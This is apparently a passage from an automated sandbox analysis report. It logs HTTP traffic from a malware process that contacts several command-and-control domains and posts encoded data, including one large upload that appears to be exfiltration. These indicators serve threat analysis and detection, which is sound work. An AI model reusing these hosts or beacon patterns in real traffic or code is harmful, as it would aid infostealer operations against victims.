                                                Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                48192.168.11.2049889176.57.64.102807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:01:13.454077005 CEST547OUTGET /mktg/?ij60MtY=0TalvP/u8kBxCEcVC8ZYLDfWzg1d8ZMLdJUcZNeUjcCfUnJGBGp8dbleblgtUVXijVAfatBw5nkrSCpMHneIWtcqoMWdglrJlT3qBoY6Uu70toyjn3om774=&wXB=brv4Erb HTTP/1.1
                                                Host: www.ayypromo.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:01:13.839389086 CEST1147INHTTP/1.1 404 Not Found
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg1_=F0QVtNqKeWjLisP5NyP2; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:13 GMT
                                                Date: Tue, 27 Aug 2024 06:01:13 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 738
                                                Last-Modified: Sun, 11 Jun 2023 21:19:31 GMT
                                                ETag: "2e2-5fde1286ba692"
                                                Accept-Ranges: bytes
                                                X-Frame-Options: SAMEORIGIN
                                                Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                                                Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                49192.168.11.204989076.223.54.146807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:01:19.069380045 CEST820OUTPOST /gir9/ HTTP/1.1
                                                Host: www.magicface.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.magicface.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.magicface.shop/gir9/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 53 37 33 41 79 7a 63 55 2f 68 42 51 56 79 37 73 30 54 45 47 33 4f 57 39 4e 6d 44 46 33 45 56 58 75 4f 30 4d 32 73 75 69 38 52 70 72 67 63 45 6f 7a 79 6f 51 51 6a 7a 6b 6e 2b 50 39 41 32 4c 52 75 35 70 46 34 38 44 45 37 37 67 37 65 36 35 67 55 68 58 62 4a 46 50 50 4e 4d 69 36 6f 2f 79 36 71 45 54 33 75 35 59 59 43 2f 2b 48 37 42 75 4e 30 42 72 72 32 59 64 41 46 59 44 71 49 70 35 2b 42 6c 69 56 4e 30 48 76 41 6c 56 67 48 75 53 71 32 36 4d 33 65 68 41 42 55 77 71 4e 69 36 58 43 69 62 2f 35 57 58 41 7a 42 4d 4b 71 49 36 30 4c 41 6e 78 48 6c 63 38 5a 50 31 49 75 2b 57 51 72 45 67 3d 3d
                                                Data Ascii: ij60MtY=S73AyzcU/hBQVy7s0TEG3OW9NmDF3EVXuO0M2sui8RprgcEozyoQQjzkn+P9A2LRu5pF48DE77g7e65gUhXbJFPPNMi6o/y6qET3u5YYC/+H7BuN0Brr2YdAFYDqIp5+BliVN0HvAlVgHuSq26M3ehABUwqNi6XCib/5WXAzBMKqI60LAnxHlc8ZP1Iu+WQrEg==


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                50192.168.11.204989176.223.54.146807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:01:21.711556911 CEST1160OUTPOST /gir9/ HTTP/1.1
                                                Host: www.magicface.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.magicface.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.magicface.shop/gir9/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 53 37 33 41 79 7a 63 55 2f 68 42 51 55 53 72 73 6e 67 38 47 2f 4f 57 79 52 32 44 46 75 55 56 54 75 4f 6f 4d 32 74 71 79 38 69 4e 72 67 39 30 6f 79 32 38 51 58 6a 7a 6b 76 65 50 68 4f 57 4b 54 75 35 6b 79 34 38 76 45 37 37 30 37 66 49 78 67 56 52 58 59 64 56 50 4f 49 4d 69 37 2b 2f 79 77 71 45 50 72 75 39 59 59 42 4d 36 48 36 44 32 4e 77 51 72 6f 38 59 64 4b 48 59 44 6c 64 5a 35 38 42 6c 75 7a 4e 77 4c 52 42 54 39 67 48 4f 79 71 33 36 4d 30 4c 68 41 47 49 41 71 65 6b 6f 65 57 73 2f 50 31 57 6c 70 67 4b 4f 65 32 53 70 63 74 42 32 63 2f 6c 4f 38 32 4f 68 78 72 33 45 78 73 59 4c 41 48 37 38 31 6f 32 53 53 47 66 78 63 31 46 5a 49 31 61 76 6a 35 49 47 52 63 70 4f 4f 41 4a 70 54 33 73 62 50 6d 37 70 59 46 49 30 70 41 4e 47 78 6c 4e 68 6e 50 6b 35 6e 61 73 4f 4e 41 43 74 45 4d 54 33 4b 72 52 49 31 4a 79 68 39 71 76 43 44 56 76 77 6e 4a 4f 31 34 37 71 42 58 44 34 30 4d 4e 46 67 41 30 69 6b 62 38 38 33 6d 6b 54 57 2f 57 44 75 64 34 32 4d 43 61 6e 4b 5a 62 66 73 68 62 67 35 41 32 72 49 [TRUNCATED]
                                                Data Ascii: ij60MtY=S73AyzcU/hBQUSrsng8G/OWyR2DFuUVTuOoM2tqy8iNrg90oy28QXjzkvePhOWKTu5ky48vE7707fIxgVRXYdVPOIMi7+/ywqEPru9YYBM6H6D2NwQro8YdKHYDldZ58BluzNwLRBT9gHOyq36M0LhAGIAqekoeWs/P1WlpgKOe2SpctB2c/lO82Ohxr3ExsYLAH781o2SSGfxc1FZI1avj5IGRcpOOAJpT3sbPm7pYFI0pANGxlNhnPk5nasONACtEMT3KrRI1Jyh9qvCDVvwnJO147qBXD40MNFgA0ikb883mkTW/WDud42MCanKZbfshbg5A2rI5BfY6PbObRRmeq8vB7M59olVlvUQ4FkLlWz2FyG0mni72CSKq0Tr3lv7e0NXScUg9tBMLNSfPpAXUG9wFmPTAmGtIyKq1p16Wmbb9oIY4dCFm5/a637DJhfcdszmiNA2+5s5few+NP3sBu3P/LNI/4GrMZGXYiga8ZEUqQv7ByLWjp0l4zoh5qLw/vJHMC731qVqMMRDrEzrM=


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                51192.168.11.204989276.223.54.14680
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:01:24.354347944 CEST2578OUTPOST /gir9/ HTTP/1.1
                                                Host: www.magicface.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.magicface.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.magicface.shop/gir9/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 53 37 33 41 79 7a 63 55 2f 68 42 51 55 53 72 73 6e 67 38 47 2f 4f 57 79 52 32 44 46 75 55 56 54 75 4f 6f 4d 32 74 71 79 38 69 46 72 67 4c 67 6f 30 55 55 51 57 6a 7a 6b 6c 2b 50 69 4f 57 4b 53 75 34 4d 32 34 38 7a 2b 37 34 4d 37 66 62 4a 67 53 6a 50 59 4e 46 50 4e 45 73 69 35 6f 2f 79 61 71 45 54 2f 75 35 30 49 43 38 4f 48 37 44 6d 4e 30 6a 7a 72 2f 49 64 41 48 59 44 70 4d 70 35 30 42 6c 37 32 4e 77 50 52 42 56 39 67 42 74 4b 71 31 6f 6b 30 54 42 41 46 64 51 71 62 75 49 65 5a 73 2f 79 45 57 6c 6f 58 4b 50 61 32 53 71 6b 74 43 31 30 2b 6c 75 38 32 48 42 78 73 7a 45 38 6c 59 4c 30 70 37 39 52 6f 32 51 43 47 4e 68 63 31 4f 59 49 32 54 76 6a 2f 66 6d 51 65 37 2b 79 49 4a 70 58 6a 73 61 72 6d 36 5a 38 46 4c 6a 31 41 41 48 78 6c 54 52 6e 4a 35 4a 6e 46 6d 75 4d 62 43 70 70 6c 54 33 71 64 52 4f 5a 4a 7a 41 64 71 35 7a 44 53 73 51 6e 50 46 56 34 75 67 52 72 6d 34 30 63 52 46 67 41 6b 69 6d 33 38 38 6b 4f 6b 53 55 61 41 57 2b 64 31 36 73 44 4f 77 61 64 42 66 73 74 54 67 35 34 6d 72 50 [TRUNCATED]
                                                Data Ascii: ij60MtY=S73AyzcU/hBQUSrsng8G/OWyR2DFuUVTuOoM2tqy8iFrgLgo0UUQWjzkl+PiOWKSu4M248z+74M7fbJgSjPYNFPNEsi5o/yaqET/u50IC8OH7DmN0jzr/IdAHYDpMp50Bl72NwPRBV9gBtKq1ok0TBAFdQqbuIeZs/yEWloXKPa2SqktC10+lu82HBxszE8lYL0p79Ro2QCGNhc1OYI2Tvj/fmQe7+yIJpXjsarm6Z8FLj1AAHxlTRnJ5JnFmuMbCpplT3qdROZJzAdq5zDSsQnPFV4ugRrm40cRFgAkim388kOkSUaAW+d16sDOwadBfstTg54mrPhBe46PL5PSGGeT0PBpI59/lVpzUR8Vl4hWxGVyXUmk0L2GLaq2Eb3lv7iKNWucXRFtA7nNA8XpCXVN9wFNPTNYGtBjKqlP146mcKtoE6QeE1mG7a6g/DVyfcpazmzwAGS5t5venuNMzMBp/v+KJIChGrgjGXFvgY8ZHzbmzp1qWAqm4Xs1qx9uBAfTYUo+5ixdcodCIWnZkdtjxH79gFQej3NoWOQz0Ey7QGuYbKEUCOKDi75ML5Us68nACSWAlR+m9U924XHSf0u5BcRYIlllnTlXIkDu18GY84z8aTBXVZzfWuY2bKfPO3H5MOp7hQrgfL/GHJHRzsc6E7TP+MLuduCVzN7M6S5wFvHGzrZOLCECVYxZo4pS3wd495or3MEL4U90kbXzZNP+q3CCR3DIDZRg8FK2e88n8isc+8WufYRdIbFwECrgG3rIEoYnXcLAds5+fgCsxEAroCIMvqWUYVU6Ub7DtwTusa8ipzMPq+NmoDWNY+mSyTg0w9enKh+xfKhDeMf0xllRESPKj1yK/pN9oBw3wlDjo4ARRwEtQWMKDgV4wBZq7LVt7vqN0j4LoBHGkTSg/Yz/EdFryd0m0OpkjvDaflsI+WQ99/WxXx/+5sz3FltBoioFYoVDHBFGgiz0drAvsMC6FaxMqxnqpCJvkf7hnBQP [TRUNCATED]
                                                Aug 27, 2024 08:01:24.354366064 CEST3867OUTData Raw: 4c 66 54 45 64 54 2b 33 6b 56 51 71 64 33 6a 70 72 56 74 68 4b 69 54 4d 4d 6b 71 50 61 57 6e 6c 70 79 36 4f 4c 52 67 52 6c 42 4a 68 2f 50 5a 5a 57 31 34 78 52 48 34 72 41 2f 30 6b 62 65 65 7a 37 63 54 2b 2b 6e 65 4b 46 45 53 6e 4a 63 74 49 45 59
                                                Data Ascii: LfTEdT+3kVQqd3jprVthKiTMMkqPaWnlpy6OLRgRlBJh/PZZW14xRH4rA/0kbeez7cT++neKFESnJctIEYCWnfk2V4XWuRU+ZSosRVEQZhBcYU1HPqKYfdR7ZbSIls9zC2NJWZc+jOl65i4SBt2GjwMI+gHZQNGtJdznI4A4eRhOysKieW78OyFrgjRyYT1rFbhLwtkrV0KQwydbKGDlT2Vg3xaI+RduvfoU7BgNvvojVWpIlcG
                                                Aug 27, 2024 08:01:24.354417086 CEST6445OUTData Raw: 45 6e 5a 4c 71 79 47 55 67 72 50 53 34 6c 78 54 79 57 55 51 56 45 37 2f 43 61 6c 4c 2f 38 37 6e 73 5a 66 47 4e 59 2b 6f 69 35 68 61 39 79 37 32 58 7a 32 42 75 31 4d 57 41 6a 4a 6d 32 31 54 47 47 45 4d 6e 55 53 4b 6f 57 6b 32 49 36 6c 52 6e 42 54
                                                Data Ascii: EnZLqyGUgrPS4lxTyWUQVE7/CalL/87nsZfGNY+oi5ha9y72Xz2Bu1MWAjJm21TGGEMnUSKoWk2I6lRnBTl4rlJ/J3qAuIV+Vcz929GFve7pNPqFw0oJvZdhztmeawZWQRvnwXoNa36jp/GSZsRNwjISDKF2DSjIlYt0Ex75AWc0Ra1lKPUy04gCthdwl7uJWX3zJE+ZQ9A+l/mXDz8a2bzlvEykKpzKiEtTuzxay1CRZ3RmhcH
                                                Aug 27, 2024 08:01:24.458065033 CEST2578OUTData Raw: 4e 33 6d 4f 67 47 31 7a 6d 51 64 6e 4d 34 6e 49 55 2f 4e 6c 55 7a 42 67 30 6c 2b 69 69 31 48 31 6c 4c 79 71 53 30 45 53 64 59 31 53 73 4f 50 70 76 36 34 39 46 62 69 35 6f 6e 43 72 78 55 62 33 49 41 65 52 4c 38 4c 4e 5a 6a 58 6d 48 63 52 6c 6a 68
                                                Data Ascii: N3mOgG1zmQdnM4nIU/NlUzBg0l+ii1H1lLyqS0ESdY1SsOPpv649Fbi5onCrxUb3IAeRL8LNZjXmHcRljh/lpDrYnVdvIdP65ljHSn0vPzbFy6fNunvqQFNRzZCvy9UbIo1u1G1sREjVV+he/aT9c9AQ0aLsGsFMYUpyIoNr5vrYX72a/u+AGu/YkVSr6wAPblZXxQ2/QwQJJtlnmCEocQTjITQ4qn6mTMQUuSdvTvjU5l9sTw/
                                                Aug 27, 2024 08:01:24.458420038 CEST1289OUTData Raw: 6f 6e 56 39 45 42 63 4a 5a 37 4b 43 75 74 6b 76 2b 56 49 4e 77 57 47 57 53 37 65 32 46 6f 44 4d 44 78 63 75 37 30 56 6d 6c 5a 4d 7a 35 70 49 74 6a 72 68 50 59 55 78 52 44 7a 48 70 67 4a 38 78 67 45 48 6e 68 70 57 6a 6d 62 4d 5a 61 71 56 78 4f 4d
                                                Data Ascii: onV9EBcJZ7KCutkv+VINwWGWS7e2FoDMDxcu70VmlZMz5pItjrhPYUxRDzHpgJ8xgEHnhpWjmbMZaqVxOMj9Uyac1VTP+bIZI/ju/xFx9192O9uDMgx2neTUy6xRVeOXyzgC8vfdFEPOzrtjVfIcldPtIU+lZLoP6jC8hUD7alUVFxQMDt2sxgb8bXYTrnE7YmgBek0jTsky6t6BdBSMNd2LDjNPzSVf5iQyb6t/m/vjAiyEYfZ
                                                Aug 27, 2024 08:01:24.458621979 CEST19335OUTData Raw: 63 2b 4e 51 48 48 78 74 44 57 33 64 67 63 65 2b 4a 63 67 68 69 2b 4d 75 36 2b 67 4f 4f 74 74 75 43 51 45 69 66 72 77 67 61 45 53 64 6a 77 31 77 4b 73 77 78 71 68 6e 41 67 4d 59 4b 61 5a 65 5a 47 35 66 2f 72 6e 47 76 53 2f 46 54 70 55 69 4a 56 6a
                                                Data Ascii: c+NQHHxtDW3dgce+Jcghi+Mu6+gOOttuCQEifrwgaESdjw1wKswxqhnAgMYKaZeZG5f/rnGvS/FTpUiJVjMBXNnA19tmJZo1prPvecVwNZbmV8UkQgMOrtdvba/2AvJ4a9zWvxDfUhcNUc1jt86MfFolO5+OjUagQAwe5MRYIwuttnS4L8Bnjn8VyLsBzPpsAMBe3c93J/24Ke1D9BKpbIJ8wEiAX3xlsjb0/fD+L1/zN2ChAvl
                                                Aug 27, 2024 08:01:24.458758116 CEST2578OUTData Raw: 68 34 73 69 76 79 71 73 35 61 33 62 48 77 53 34 48 6f 77 31 49 49 69 51 6d 53 6d 6e 38 75 30 44 4c 78 47 4a 55 35 54 42 4b 30 4b 76 53 59 63 6b 4e 6f 68 74 55 58 71 36 52 76 52 71 79 55 73 68 36 36 71 4c 53 63 53 71 45 32 48 6c 58 30 56 52 43 48
                                                Data Ascii: h4sivyqs5a3bHwS4How1IIiQmSmn8u0DLxGJU5TBK0KvSYckNohtUXq6RvRqyUsh66qLScSqE2HlX0VRCHB18bp8fpR7p95BMpTwldUr5ne7lrww3ioCI2LRk6V9vnrepmVGMRPywdv+0Yv7EaScv1J3xWjYOVjYsuOwzu8bm9reP0JxYOemFQLVkKivKEbu4mqk9U3H7aQGVijVYGq8eIgy+ViH4DaU2WTKLzlHcS5uRFTmjfB


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                52192.168.11.204989376.223.54.14680
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:01:26.993096113 CEST548OUTGET /gir9/?ij60MtY=f5fgxEQYyH9aCEvnqRNhj/uGI07axwFwhdkCg+bZ+BEtnM1/7SlBYCrjg9utQFPLrd0Y68zwkqIMf6pHdwjKMQmtDey6vcSJt3zCtqxSD+6F6gKu0jTr2I8=&wXB=brv4Erb HTTP/1.1
                                                Host: www.magicface.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:01:27.097039938 CEST395INHTTP/1.1 200 OK
                                                Server: openresty
                                                Date: Tue, 27 Aug 2024 06:01:27 GMT
                                                Content-Type: text/html
                                                Content-Length: 255
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 69 6a 36 30 4d 74 59 3d 66 35 66 67 78 45 51 59 79 48 39 61 43 45 76 6e 71 52 4e 68 6a 2f 75 47 49 30 37 61 78 77 46 77 68 64 6b 43 67 2b 62 5a 2b 42 45 74 6e 4d 31 2f 37 53 6c 42 59 43 72 6a 67 39 75 74 51 46 50 4c 72 64 30 59 36 38 7a 77 6b 71 49 4d 66 36 70 48 64 77 6a 4b 4d 51 6d 74 44 65 79 36 76 63 53 4a 74 33 7a 43 74 71 78 53 44 2b 36 46 36 67 4b 75 30 6a 54 72 32 49 38 3d 26 77 58 42 3d 62 72 76 34 45 72 62 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ij60MtY=f5fgxEQYyH9aCEvnqRNhj/uGI07axwFwhdkCg+bZ+BEtnM1/7SlBYCrjg9utQFPLrd0Y68zwkqIMf6pHdwjKMQmtDey6vcSJt3zCtqxSD+6F6gKu0jTr2I8=&wXB=brv4Erb"}</script></head></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                53192.168.11.2049895199.59.243.22680
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:03:07.770872116 CEST555OUTGET /enra/?wXB=brv4Erb&ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ= HTTP/1.1
                                                Host: www.foundation-repair.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:03:07.873545885 CEST1200INHTTP/1.1 200 OK
                                                date: Tue, 27 Aug 2024 06:03:07 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1478
                                                x-request-id: 990435df-95d1-4a73-bba1-26f710af7ccf
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Im6T6/pqCTudfemr3/Ry3QOMsMpidAGuIZS152vKDAPS35jIwkuAAyjevEKaV89FkqL+9D93AJ/s2twwhb4hMA==
                                                set-cookie: parking_session=990435df-95d1-4a73-bba1-26f710af7ccf; expires=Tue, 27 Aug 2024 06:18:07 GMT; path=/
                                                connection: close
                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 6d 36 54 36 2f 70 71 43 54 75 64 66 65 6d 72 33 2f 52 79 33 51 4f 4d 73 4d 70 69 64 41 47 75 49 5a 53 31 35 32 76 4b 44 41 50 53 33 35 6a 49 77 6b 75 41 41 79 6a 65 76 45 4b 61 56 38 39 46 6b 71 4c 2b 39 44 39 33 41 4a 2f 73 32 74 77 77 68 62 34 68 4d 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Im6T6/pqCTudfemr3/Ry3QOMsMpidAGuIZS152vKDAPS35jIwkuAAyjevEKaV89FkqL+9D93AJ/s2twwhb4hMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
                                                Aug 27, 2024 08:03:07.873616934 CEST967INData Raw: 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTkwNDM1ZGYtOTVkMS00YTczLWJiYTEtMjZmNzEwYW


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                54192.168.11.2049896103.247.8.5380
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:03:13.241627932 CEST835OUTPOST /21hf/ HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.asa-malukuutara.com
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.asa-malukuutara.com/21hf/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 6b 33 6c 72 53 2f 54 35 54 32 79 36 31 58 37 4c 61 69 54 6b 6b 6c 53 4c 43 52 35 68 63 4b 2f 46 54 61 30 6e 76 50 71 6b 6c 63 6a 50 37 41 45 58 44 77 75 52 73 75 78 35 51 31 6e 65 71 42 58 58 68 45 4f 51 54 4d 47 58 46 61 37 4c 36 51 50 45 42 4d 6c 36 33 51 56 35 77 6b 4b 59 74 58 41 77 76 4a 5a 61 34 39 37 71 6e 50 6a 49 31 58 6d 32 55 71 6e 45 31 4c 75 6a 34 56 66 54 55 68 48 6b 7a 61 50 72 42 37 4b 46 56 76 67 64 6f 7a 68 2b 67 6f 77 39 63 54 59 76 5a 53 5a 5a 31 34 62 69 73 2b 6c 62 62 49 33 51 77 78 68 5a 32 36 46 42 4c 35 43 49 70 6d 44 4f 4f 79 75 65 4e 35 56 77 4f 41 3d 3d
